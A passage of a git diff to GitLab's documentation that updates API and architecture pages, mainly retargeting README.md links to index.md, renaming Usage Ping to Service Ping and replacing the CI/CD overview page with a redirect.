scope the rule by | - -### Enable or disable External Project-level MR status checks **(ULTIMATE SELF)** - -Enable or disable External Project-level MR status checks is under development and not ready for production use. It is -deployed behind a feature flag that is **disabled by default**. -[GitLab administrators with access to the GitLab Rails console](../user/feature_flags.md) -can enable it. - -To enable it: - -```ruby -# For the instance -Feature.enable(:ff_compliance_approval_gates) -# For a single project -Feature.enable(:ff_compliance_approval_gates, Project.find(<project id>)) -``` - -To disable it: - -```ruby -# For the instance -Feature.disable(:ff_compliance_approval_gates) -# For a single project -Feature.disable(:ff_compliance_approval_gates, Project.find(<project id>)) -``` - -To enable it: - -```ruby -# For the instance -Feature.enable(:ff_compliance_approval_gates) -# For a single project -Feature.enable(:ff_compliance_approval_gates, Project.find(<project id>)) -``` - -To disable it: - -```ruby -# For the instance -Feature.disable(:ff_compliance_approval_gates) -# For a single project -Feature.disable(:ff_compliance_approval_gates, Project.find(<project id>) -``` +| Attribute | Type | Required | Description | +|------------------------|------------------|----------|------------------------------------------------| +| `id` | integer | yes | ID of a project | +| `rule_id` | integer | yes | ID of an external status check | +| `name` | string | no | Display name of status check | +| `external_url` | string | no | URL of external status check resource | +| `protected_branch_ids` | `array<Integer>` | no | IDs of protected branches to scope the rule by | ## Related links -- [External status checks](../user/project/merge_requests/status_checks.md) +- [External status checks](../user/project/merge_requests/status_checks.md). diff --git a/doc/api/tags.md b/doc/api/tags.md index 53a981256aa..bbde6c1491b 100644 --- a/doc/api/tags.md +++ b/doc/api/tags.md @@ -21,7 +21,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string| yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user| +| `id` | integer/string| yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user| | `order_by` | string | no | Return tags ordered by `name` or `updated` fields. Default is `updated` | | `sort` | string | no | Return tags sorted in `asc` or `desc` order. Default is `desc` | | `search` | string | no | Return list of tags matching the search criteria. You can use `^term` and `term$` to find tags that begin and end with `term` respectively. | @@ -72,7 +72,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `tag_name` | string | yes | The name of the tag | ```shell @@ -119,7 +119,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------------- | -------------- | -------- | --------------------------------------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `tag_name` | string | yes | The name of a tag | | `ref` | string | yes | Create tag using commit SHA, another tag name, or branch name | | `message` | string | no | Creates annotated tag | @@ -176,5 +176,5 @@ Parameters: | Attribute | Type | Required | Description | | ---------- | -------------- | -------- | --------------------------------------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `tag_name` | string | yes | The name of a tag | diff --git a/doc/api/templates/gitlab_ci_ymls.md b/doc/api/templates/gitlab_ci_ymls.md index 388556d354f..82abe598cf6 100644 --- a/doc/api/templates/gitlab_ci_ymls.md +++ b/doc/api/templates/gitlab_ci_ymls.md @@ -9,7 +9,7 @@ type: reference In GitLab, there is an API endpoint available to work with GitLab CI/CD YMLs. For more information on CI/CD pipeline configuration in GitLab, see the -[configuration reference documentation](../../ci/yaml/README.md). +[configuration reference documentation](../../ci/yaml/index.md). ## List GitLab CI YAML templates diff --git a/doc/api/todos.md b/doc/api/todos.md index 69c0f760a29..737bfb11da9 100644 --- a/doc/api/todos.md +++ b/doc/api/todos.md @@ -4,13 +4,13 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# To dos API +# GitLab To-Do List API **(FREE)** -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/3188) in GitLab 8.10. +Interact with [to-do items](../user/todos.md) using the REST API. -## Get a list of to dos +## Get a list of to-do items -Returns a list of [to-do items](../user/todos.md). When no filter is applied, it +Returns a list of to-do items. When no filter is applied, it returns all pending to-do items for the current user. Different filters allow the user to refine the request. @@ -26,7 +26,7 @@ Parameters: | `author_id` | integer | no | The ID of an author | | `project_id` | integer | no | The ID of a project | | `group_id` | integer | no | The ID of a group | -| `state` | string | no | The state of the to do. Can be either `pending` or `done` | +| `state` | string | no | The state of the to-do item. Can be either `pending` or `done` | | `type` | string | no | The type of to-do item. Can be either `Issue`, `MergeRequest`, `DesignManagement::Design` or `AlertManagement::Alert` | ```shell @@ -190,8 +190,8 @@ Example Response: ## Mark a to-do item as done -Marks a single pending to do given by its ID for the current user as done. The -to do marked as done is returned in the response. +Marks a single pending to-do item given by its ID for the current user as done. The +to-do item marked as done is returned in the response. ```plaintext POST /todos/:id/mark_as_done @@ -287,9 +287,9 @@ Example Response: } ``` -## Mark all to dos as done +## Mark all to-do items as done -Marks all pending to dos for the current user as done. It returns the HTTP status code `204` with an empty response. +Marks all pending to-do items for the current user as done. It returns the HTTP status code `204` with an empty response. ```plaintext POST /todos/mark_as_done diff --git a/doc/api/usage_data.md b/doc/api/usage_data.md index 024caa96565..7a7f36ce43a 100644 --- a/doc/api/usage_data.md +++ b/doc/api/usage_data.md @@ -5,9 +5,9 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: reference, api --- -# Usage Data API **(FREE SELF)** +# Service Data API **(FREE SELF)** -The Usage Data API is associated with [Usage Ping](../development/usage_ping/index.md). +The Service Data API is associated with [Service Ping](../development/service_ping/index.md). ## Export metric definitions as a single YAML file @@ -48,14 +48,14 @@ Example response: ... ``` -## Export Usage Ping SQL queries +## Export Service Ping SQL queries This action is available only for the GitLab instance [Administrator](../user/permissions.md) users. > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/57016) in GitLab 13.11. > - [Deployed behind a feature flag](../user/feature_flags.md), disabled by default. -Return all of the raw SQL queries used to compute Usage Ping. +Return all of the raw SQL queries used to compute Service Ping. ```plaintext GET /usage_data/queries @@ -116,7 +116,7 @@ Example response: > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/57050) in GitLab 13.11. > - [Deployed behind a feature flag](../user/feature_flags.md), disabled by default. -Return all non-SQL metrics data used in the usage ping. +Return all non-SQL metrics data used in the Service ping. Example request: diff --git a/doc/api/users.md b/doc/api/users.md index 0e7b197b106..0d922487cf9 100644 --- a/doc/api/users.md +++ b/doc/api/users.md @@ -1352,7 +1352,7 @@ Parameters: - `id` (required) - ID of specified user - `email` (required) - email address -- `skip_confirmation` (optional) - Skip confirmation and assume e-mail is verified - true or false (default) +- `skip_confirmation` (optional) - Skip confirmation and assume email is verified - true or false (default) ## Delete email for current user diff --git a/doc/api/v3_to_v4.md b/doc/api/v3_to_v4.md index c6d883371a3..69e1ea56c2c 100644 --- a/doc/api/v3_to_v4.md +++ b/doc/api/v3_to_v4.md @@ -9,10 +9,10 @@ info: To determine the technical writer assigned to the Stage/Group associated w WARNING: The GitLab API v3 was removed in [GitLab 11.0](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/36819). -For information about the current version of the GitLab API, read the [API documentation](README.md). +For information about the current version of the GitLab API, read the [API documentation](index.md). ## Related links -- [GitLab v3 API documentation](https://gitlab.com/gitlab-org/gitlab-foss/-/blob/8-16-stable/doc/api/README.md) +- [GitLab v3 API documentation](https://gitlab.com/gitlab-org/gitlab-foss/-/blob/8-16-stable/doc/api/index.md) - [Migration guide](https://gitlab.com/gitlab-org/gitlab-foss/-/blob/11-0-stable/doc/api/v3_to_v4.md) from v3 to v4 diff --git a/doc/api/visual_review_discussions.md b/doc/api/visual_review_discussions.md index c3414a4e9ec..8457f63fd38 100644 --- a/doc/api/visual_review_discussions.md +++ b/doc/api/visual_review_discussions.md @@ -26,7 +26,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of a merge request | | `body` | string | yes | The content of the thread | | `position` | hash | no | Position when creating a diff note | diff --git a/doc/api/vulnerabilities.md b/doc/api/vulnerabilities.md index 5ec769df08c..b18a837de26 100644 --- a/doc/api/vulnerabilities.md +++ b/doc/api/vulnerabilities.md @@ -21,7 +21,7 @@ across GitLab releases. Please use the [GraphQL API](graphql/reference/index.md#queryvulnerabilities) instead. -Every API call to vulnerabilities must be [authenticated](README.md#authentication). +Every API call to vulnerabilities must be [authenticated](index.md#authentication). Vulnerability permissions inherit permissions from their project. If a project is private, and a user isn't a member of the project to which the vulnerability diff --git a/doc/api/vulnerability_exports.md b/doc/api/vulnerability_exports.md index 6d01d7e7d96..4240d363ff0 100644 --- a/doc/api/vulnerability_exports.md +++ b/doc/api/vulnerability_exports.md @@ -13,7 +13,7 @@ This API is in an alpha stage and considered unstable. The response payload may be subject to change or breakage across GitLab releases. -Every API call to vulnerability exports must be [authenticated](README.md#authentication). +Every API call to vulnerability exports must be [authenticated](index.md#authentication). ## Create a project-level vulnerability export @@ -34,7 +34,7 @@ POST /security/projects/:id/vulnerability_exports | Attribute | Type | Required | Description | | ------------------- | ----------------- | ---------- | -----------------------------------------------------------------------------------------------------------------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path](README.md#namespaced-path-encoding) of the project which the authenticated user is a member of | +| `id` | integer or string | yes | The ID or [URL-encoded path](index.md#namespaced-path-encoding) of the project which the authenticated user is a member of | ```shell curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/security/projects/1/vulnerability_exports" @@ -80,7 +80,7 @@ POST /security/groups/:id/vulnerability_exports | Attribute | Type | Required | Description | | ------------------- | ----------------- | ---------- | -----------------------------------------------------------------------------------------------------------------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path](README.md#namespaced-path-encoding) of the group which the authenticated user is a member of | +| `id` | integer or string | yes | The ID or [URL-encoded path](index.md#namespaced-path-encoding) of the group which the authenticated user is a member of | ```shell curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/security/groups/1/vulnerability_exports" diff --git a/doc/api/vulnerability_findings.md b/doc/api/vulnerability_findings.md index b4791ee8365..c7f045a67a0 100644 --- a/doc/api/vulnerability_findings.md +++ b/doc/api/vulnerability_findings.md @@ -14,7 +14,7 @@ for serving [Vulnerability objects](https://gitlab.com/gitlab-org/gitlab/-/issue To fix any broken integrations with the former Vulnerabilities API, change the `vulnerabilities` URL part to be `vulnerability_findings`. -Every API call to vulnerability findings must be [authenticated](README.md#authentication). +Every API call to vulnerability findings must be [authenticated](index.md#authentication). Vulnerability findings are project-bound entities. If a user is not a member of a project and the project is private, a request on @@ -34,7 +34,7 @@ across GitLab releases. By default, `GET` requests return 20 results at a time because the API results are paginated. -Read more on [pagination](README.md#pagination). +Read more on [pagination](index.md#pagination). ## List project vulnerability findings @@ -57,7 +57,7 @@ Beginning with GitLab 12.9, the `undefined` severity and confidence level is no | Attribute | Type | Required | Description | | ------------- | -------------- | -------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) which the authenticated user is a member of. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) which the authenticated user is a member of. | | `report_type` | string array | no | Returns vulnerability findings belonging to specified report type. Valid values: `sast`, `dast`, `dependency_scanning`, or `container_scanning`. Defaults to all. | | `scope` | string | no | Returns vulnerability findings for the given scope: `all` or `dismissed`. Defaults to `dismissed`. | | `severity` | string array | no | Returns vulnerability findings belonging to specified severity level: `info`, `unknown`, `low`, `medium`, `high`, or `critical`. Defaults to all. | diff --git a/doc/api/wikis.md b/doc/api/wikis.md index d6cc6f938b8..8f71097aa0f 100644 --- a/doc/api/wikis.md +++ b/doc/api/wikis.md @@ -22,7 +22,7 @@ GET /projects/:id/wikis | Attribute | Type | Required | Description | | --------- | ------- | -------- | --------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `with_content` | boolean | no | Include pages' content | ```shell @@ -63,7 +63,7 @@ GET /projects/:id/wikis/:slug | Attribute | Type | Required | Description | | --------- | ------- | -------- | --------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `slug` | string | yes | URLencoded slug (a unique string) of the wiki page, such as `dir%2Fpage_name` | ```shell @@ -91,7 +91,7 @@ POST /projects/:id/wikis | Attribute | Type | Required | Description | | ------------- | ------- | -------- | ---------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `content` | string | yes | The content of the wiki page | | `title` | string | yes | The title of the wiki page | | `format` | string | no | The format of the wiki page. Available formats are: `markdown` (default), `rdoc`, `asciidoc` and `org` | @@ -122,7 +122,7 @@ PUT /projects/:id/wikis/:slug | Attribute | Type | Required | Description | | --------------- | ------- | --------------------------------- | ------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `content` | string | yes if `title` is not provided | The content of the wiki page | | `title` | string | yes if `content` is not provided | The title of the wiki page | | `format` | string | no | The format of the wiki page. Available formats are: `markdown` (default), `rdoc`, `asciidoc` and `org` | @@ -154,7 +154,7 @@ DELETE /projects/:id/wikis/:slug | Attribute | Type | Required | Description | | --------- | ------- | -------- | --------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `slug` | string | yes | URL-encoded slug (a unique string) of the wiki page, such as `dir%2Fpage_name` | ```shell @@ -174,7 +174,7 @@ POST /projects/:id/wikis/attachments | Attribute | Type | Required | Description | | ------------- | ------- | -------- | ---------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `file` | string | yes | The attachment to be uploaded | | `branch` | string | no | The name of the branch. Defaults to the wiki repository default branch | diff --git a/doc/architecture/blueprints/container_registry_metadata_database/index.md b/doc/architecture/blueprints/container_registry_metadata_database/index.md index 403a1a1130a..b71517de061 100644 --- a/doc/architecture/blueprints/container_registry_metadata_database/index.md +++ b/doc/architecture/blueprints/container_registry_metadata_database/index.md @@ -26,7 +26,7 @@ graph LR R -- Write/read metadata --> B ``` -Client applications (e.g. GitLab Rails and Docker CLI) interact with the Container Registry through its [HTTP API](https://gitlab.com/gitlab-org/container-registry/-/blob/master/docs/spec/api.md). The most common operations are pushing and pulling images to/from the registry, which require a series of HTTP requests in a specific order. The request flow for these operations is detailed in the [Request flow](https://gitlab.com/gitlab-org/container-registry/-/blob/master/docs-gitlab/push-pull-request-flow.md). +Client applications (for example, GitLab Rails and Docker CLI) interact with the Container Registry through its [HTTP API](https://gitlab.com/gitlab-org/container-registry/-/blob/master/docs/spec/api.md). The most common operations are pushing and pulling images to/from the registry, which require a series of HTTP requests in a specific order. The request flow for these operations is detailed in the [Request flow](https://gitlab.com/gitlab-org/container-registry/-/blob/master/docs-gitlab/push-pull-request-flow.md). The registry supports multiple [storage backends](https://gitlab.com/gitlab-org/container-registry/-/blob/master/docs/configuration.md#storage), including Google Cloud Storage (GCS) which is used for the GitLab.com registry. In the storage backend, images are stored as blobs, deduplicated, and shared across repositories. These are then linked (like a symlink) to each repository that relies on them, giving them access to the central storage location. @@ -54,7 +54,7 @@ sequenceDiagram C->>R: docker login gitlab.example.com R->>C: 401 Unauthorized - Note left of R: The response includes the realm (e.g., https://gitlab.example.com/jwt/auth)<br> from where a token should be obtained + Note left of R: The response includes the realm (for example, https://gitlab.example.com/jwt/auth)<br> from where a token should be obtained C->>G: Obtain Bearer token G->>C: 200 OK C-->>R: Push/pull requests diff --git a/doc/architecture/blueprints/database_testing/index.md b/doc/architecture/blueprints/database_testing/index.md index 162b112732c..fb52f6cc7d3 100644 --- a/doc/architecture/blueprints/database_testing/index.md +++ b/doc/architecture/blueprints/database_testing/index.md @@ -97,11 +97,11 @@ The short-term goal is detailed in [this epic](https://gitlab.com/groups/gitlab- ### Mid-term - Improved feedback, query testing and background migration testing -Mid-term, we plan to expand the level of detail the testing pipeline reports back to the Merge Request and expand its scope to cover query testing, too. By doing so, we use our experience from database code reviews and using thin-clone technology and bring this back closer to the GitLab workflow. Instead of reaching out to different tools (`postgres.ai`, `joe`, Slack, plan visualizations etc.) we bring this back to GitLab and working directly on the Merge Request. +Mid-term, we plan to expand the level of detail the testing pipeline reports back to the Merge Request and expand its scope to cover query testing, too. By doing so, we use our experience from database code reviews and using thin-clone technology and bring this back closer to the GitLab workflow. Instead of reaching out to different tools (`postgres.ai`, `joe`, Slack, plan visualizations, and so on) we bring this back to GitLab and working directly on the Merge Request. Secondly, we plan to cover background migrations testing, too. These are typically data migrations that are scheduled to run over a long period of time. The success of both the scheduling phase and the job execution phase typically depends a lot on data distribution - which only surfaces when running these migrations on actual production data. In order to become confident about a background migration, we plan to provide the following feedback: -1. Scheduling phase - query statistics (for example a histogram of query execution times), job statistics (how many jobs, overall duration etc.), batch sizes. +1. Scheduling phase - query statistics (for example a histogram of query execution times), job statistics (how many jobs, overall duration, and so on), batch sizes. 1. Execution phase - using a few instances of a job as examples, we execute those to gather query and runtime statistics. ### Long-term - incorporate into GitLab product @@ -114,7 +114,7 @@ At the core of this problem lies the concern about executing (potentially arbitr An alternative approach we have discussed and abandoned is to "scrub" and anonymize production data. The idea is to remove any sensitive data from the database and use the resulting dataset for database testing. This has a lot of downsides which led us to abandon the idea: -- Anonymization is complex by nature - it is a hard problem to call a "scrubbed clone" actually safe to work with in public. Different data types may require different anonymization techniques (e.g. anonymizing sensitive information inside a JSON field) and only focusing on one attribute at a time does not guarantee that a dataset is fully anonymized (for example join attacks or using timestamps in conjunction to public profiles/projects to de-anonymize users by there activity). +- Anonymization is complex by nature - it is a hard problem to call a "scrubbed clone" actually safe to work with in public. Different data types may require different anonymization techniques (for example, anonymizing sensitive information inside a JSON field) and only focusing on one attribute at a time does not guarantee that a dataset is fully anonymized (for example join attacks or using timestamps in conjunction to public profiles/projects to de-anonymize users by there activity). - Anonymization requires an additional process to keep track and update the set of attributes considered as sensitive, ongoing maintenance and security reviews every time the database schema changes. - Annotating data as "sensitive" is error prone, with the wrong anonymization approach used for a data type or one sensitive attribute accidentally not marked as such possibly leading to a data breach. - Scrubbing not only removes sensitive data, but it also changes data distribution, which greatly affects performance of migrations and queries. diff --git a/doc/architecture/blueprints/graphql_api/index.md b/doc/architecture/blueprints/graphql_api/index.md index b856f7d96ad..b3ba1ad1960 100644 --- a/doc/architecture/blueprints/graphql_api/index.md +++ b/doc/architecture/blueprints/graphql_api/index.md @@ -95,7 +95,7 @@ notify users that we plan to remove them. - Define a data-informed deprecation policy that will serve our users better - Build a dashboard showing usage frequency of deprecated GraphQL fields -- Build mechanisms required to send deprecated fields usage in usage ping +- Build mechanisms required to send deprecated fields usage in Service Ping ### Ensure consistency with the rest of the codebase diff --git a/doc/architecture/blueprints/image_resizing/index.md b/doc/architecture/blueprints/image_resizing/index.md index 26c15d7a035..f2fd7543b90 100644 --- a/doc/architecture/blueprints/image_resizing/index.md +++ b/doc/architecture/blueprints/image_resizing/index.md @@ -39,7 +39,7 @@ Content image resizing is a more complex problem to tackle. There are no set siz - Extract first image of GIF's so we can prevent from loading 10MB pixels - Check Device Pixel Ratio to deliver nice images on High DPI screens - Progressive image loading, similar to what is described in [this article about how to build a progressive image loader](https://www.sitepoint.com/how-to-build-your-own-progressive-image-loader/) -- Resizing recommendations (size, clarity, etc.) +- Resizing recommendations (size, clarity, and so on) - Storage The MVC Avatar resizing implementation is integrated into Workhorse. With the extra requirements for content image resizing, this may require further use of GraphicsMagik (GM) or a similar library and breaking it out of Workhorse. diff --git a/doc/ci/README.md b/doc/ci/README.md index dc4312250ca..5ab8653dc35 100644 --- a/doc/ci/README.md +++ b/doc/ci/README.md @@ -1,186 +1,8 @@ --- -stage: Verify -group: Pipeline Execution -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments -comments: false -description: "Learn how to use GitLab CI/CD, the GitLab built-in Continuous Integration, Continuous Deployment, and Continuous Delivery toolset to build, test, and deploy your application." -type: index +redirect_to: 'index.md' --- -# GitLab CI/CD **(FREE)** +This document was moved to [another location](index.md). -GitLab CI/CD is a tool built into GitLab for software development -through the [continuous methodologies](introduction/index.md): - -- Continuous Integration (CI) -- Continuous Delivery (CD) -- Continuous Deployment (CD) - -NOTE: -Out-of-the-box management systems can decrease hours spent on maintaining toolchains by 10% or more. -Watch our ["Mastering continuous software development"](https://about.gitlab.com/webcast/mastering-ci-cd/) -webcast to learn about continuous methods and how the GitLab built-in CI can help you simplify and scale software development. - -Continuous Integration works by pushing small code chunks to your -application's codebase hosted in a Git repository, and to every -push, run a pipeline of scripts to build, test, and validate the -code changes before merging them into the main branch. - -Continuous Delivery and Deployment consist of a step further CI, -deploying your application to production at every -push to the default branch of the repository. - -These methodologies allow you to catch bugs and errors early in -the development cycle, ensuring that all the code deployed to -production complies with the code standards you established for -your app. - -GitLab can also automatically detect, build, test, deploy, and -monitor your applications by using [Auto DevOps](../topics/autodevops/index.md). - -For a complete overview of these methodologies and GitLab CI/CD, -read the [Introduction to CI/CD with GitLab](introduction/index.md). - -<div class="video-fallback"> - Video demonstration of GitLab CI/CD: <a href="https://www.youtube.com/watch?v=1iXFbchozdY">Demo: CI/CD with GitLab</a>. -</div> -<figure class="video-container"> - <iframe src="https://www.youtube.com/embed/1iXFbchozdY" frameborder="0" allowfullscreen="true"> </iframe> -</figure> - -## Concepts - -GitLab CI/CD uses a number of concepts to describe and run your build and deploy. - -| Concept | Description | -|:--------------------------------------------------------|:-------------------------------------------------------------------------------| -| [Pipelines](pipelines/index.md) | Structure your CI/CD process through pipelines. | -| [CI/CD variables](variables/README.md) | Reuse values based on a variable/value key pair. | -| [Environments](environments/index.md) | Deploy your application to different environments (e.g., staging, production). | -| [Job artifacts](pipelines/job_artifacts.md) | Output, use, and reuse job artifacts. | -| [Cache dependencies](caching/index.md) | Cache your dependencies for a faster execution. | -| [GitLab Runner](https://docs.gitlab.com/runner/) | Configure your own runners to execute your scripts. | -| [Pipeline efficiency](pipelines/pipeline_efficiency.md) | Configure your pipelines to run quickly and efficiently. | -| [Test cases](test_cases/index.md) | Configure your pipelines to run quickly and efficiently. <!--- this seems to be a duplicate description ---> | - -## Configuration - -GitLab CI/CD supports numerous configuration options: - -| Configuration | Description | -|:----------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------| -| [Schedule pipelines](pipelines/schedules.md) | Schedule pipelines to run as often as you need. | -| [Custom path for `.gitlab-ci.yml`](pipelines/settings.md#custom-cicd-configuration-file) | Define a custom path for the CI/CD configuration file. | -| [Git submodules for CI/CD](git_submodules.md) | Configure jobs for using Git submodules. | -| [SSH keys for CI/CD](ssh_keys/index.md) | Using SSH keys in your CI pipelines. | -| [Pipeline triggers](triggers/README.md) | Trigger pipelines through the API. | -| [Pipelines for Merge Requests](merge_request_pipelines/index.md) | Design a pipeline structure for running a pipeline in merge requests. | -| [Integrate with Kubernetes clusters](../user/project/clusters/index.md) | Connect your project to Google Kubernetes Engine (GKE) or an existing Kubernetes cluster. | -| [Optimize GitLab and GitLab Runner for large repositories](large_repositories/index.md) | Recommended strategies for handling large repositories. | -| [`.gitlab-ci.yml` full reference](yaml/README.md) | All the attributes you can use with GitLab CI/CD. | - -Note that certain operations can only be performed according to the -[user](../user/permissions.md#gitlab-cicd-permissions) and [job](../user/permissions.md#job-permissions) permissions. - -## Feature set - -Use the vast GitLab CI/CD to easily configure it for specific purposes. -Its feature set is listed on the table below according to DevOps stages. - -| Feature | Description | -|:------------------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------------------------------------------------| -| **Configure** | | -| [Auto DevOps](../topics/autodevops/index.md) | Set up your app's entire lifecycle. | -| [ChatOps](chatops/index.md) | Trigger CI jobs from chat, with results sent back to the channel. | -|-------------------------------------------------------------------------------------------------+--------------------------------------------------------------------------------------------------------------------------------| -| **Verify** | | -| [Browser Performance Testing](../user/project/merge_requests/browser_performance_testing.md) | Quickly determine the browser performance impact of pending code changes. | -| [Load Performance Testing](../user/project/merge_requests/load_performance_testing.md) | Quickly determine the server performance impact of pending code changes. | -| [CI services](services/index.md) | Link Docker containers with your base image. | -| [Code Quality](../user/project/merge_requests/code_quality.md) | Analyze your source code quality. | -| [GitLab CI/CD for external repositories](ci_cd_for_external_repos/index.md) **(PREMIUM)** | Get the benefits of GitLab CI/CD combined with repositories in GitHub and Bitbucket Cloud. | -| [Interactive Web Terminals](interactive_web_terminal/index.md) **(FREE SELF)** | Open an interactive web terminal to debug the running jobs. | -| [Unit test reports](unit_test_reports.md) | Identify script failures directly on merge requests. | -| [Using Docker images](docker/using_docker_images.md) | Use GitLab and GitLab Runner with Docker to build and test applications. | -|-------------------------------------------------------------------------------------------------+--------------------------------------------------------------------------------------------------------------------------------| -| **Release** | | -| [Auto Deploy](../topics/autodevops/stages.md#auto-deploy) | Deploy your application to a production environment in a Kubernetes cluster. | -| [Building Docker images](docker/using_docker_build.md) | Maintain Docker-based projects using GitLab CI/CD. | -| [Canary Deployments](../user/project/canary_deployments.md) | Ship features to only a portion of your pods and let a percentage of your user base to visit the temporarily deployed feature. | -| [Deploy Boards](../user/project/deploy_boards.md) | Check the current health and status of each CI/CD environment running on Kubernetes. | -| [Feature Flags](../operations/feature_flags.md) **(PREMIUM)** | Deploy your features behind Feature Flags. | -| [GitLab Pages](../user/project/pages/index.md) | Deploy static websites. | -| [GitLab Releases](../user/project/releases/index.md) | Add release notes to Git tags. | -| [Review Apps](review_apps/index.md) | Configure GitLab CI/CD to preview code changes. | -| [Cloud deployment](cloud_deployment/index.md) | Deploy your application to a main cloud provider. | -|-------------------------------------------------------------------------------------------------+--------------------------------------------------------------------------------------------------------------------------------| -| **Secure** | | -| [Container Scanning](../user/application_security/container_scanning/index.md) **(ULTIMATE)** | Check your Docker containers for known vulnerabilities. | -| [Dependency Scanning](../user/application_security/dependency_scanning/index.md) **(ULTIMATE)** | Analyze your dependencies for known vulnerabilities. | -| [License Compliance](../user/compliance/license_compliance/index.md) **(ULTIMATE)** | Search your project dependencies for their licenses. | -| [Security Test reports](../user/application_security/index.md) **(ULTIMATE)** | Check for app vulnerabilities. | - -## Examples - -Find example project code and tutorials for using GitLab CI/CD with a variety of app frameworks, languages, and platforms -on the [CI Examples](examples/README.md) page. - -## Administration **(FREE SELF)** - -As a GitLab administrator, you can change the default behavior -of GitLab CI/CD for: - -- An [entire GitLab instance](../user/admin_area/settings/continuous_integration.md). -- Specific projects, using [pipelines settings](pipelines/settings.md). - -See also: - -- [How to enable or disable GitLab CI/CD](enable_or_disable_ci.md). -- Other [CI administration settings](../administration/index.md#continuous-integration-settings). - -## References - -### Why GitLab CI/CD? - -Learn more about: - -- [Why you might chose GitLab CI/CD](https://about.gitlab.com/blog/2016/10/17/gitlab-ci-oohlala/). -- [Reasons you might migrate from another platform](https://about.gitlab.com/blog/2016/07/22/building-our-web-app-on-gitlab-ci/). -- [5 Teams that made the switch to GitLab CI/CD](https://about.gitlab.com/blog/2019/04/25/5-teams-that-made-the-switch-to-gitlab-ci-cd/) - -See also the [Why CI/CD?](https://docs.google.com/presentation/d/1OGgk2Tcxbpl7DJaIOzCX4Vqg3dlwfELC3u2jEeCBbDk) presentation. - -### Breaking changes - -As GitLab CI/CD has evolved, certain breaking changes have -been necessary. These are: - -#### 13.0 - -- [Remove Backported `os.Expand`](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4915). -- [Remove Fedora 29 package support](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/16158). -- [Remove macOS 32-bit support](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/25466). -- [Removed `debug/jobs/list?v=1` endpoint](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/6361). -- [Remove support for array of strings when defining services for Docker executor](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4922). -- [Remove `--docker-services` flag on register command](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/6404). -- [Remove legacy build directory caching](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4180). -- [Remove `FF_USE_LEGACY_VOLUMES_MOUNTING_ORDER` feature flag](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/6581). -- [Remove support for Windows Server 1803](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/6553). - -#### 12.0 - -- [Use `refspec` to clone/fetch Git repository](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4069). -- [Old cache 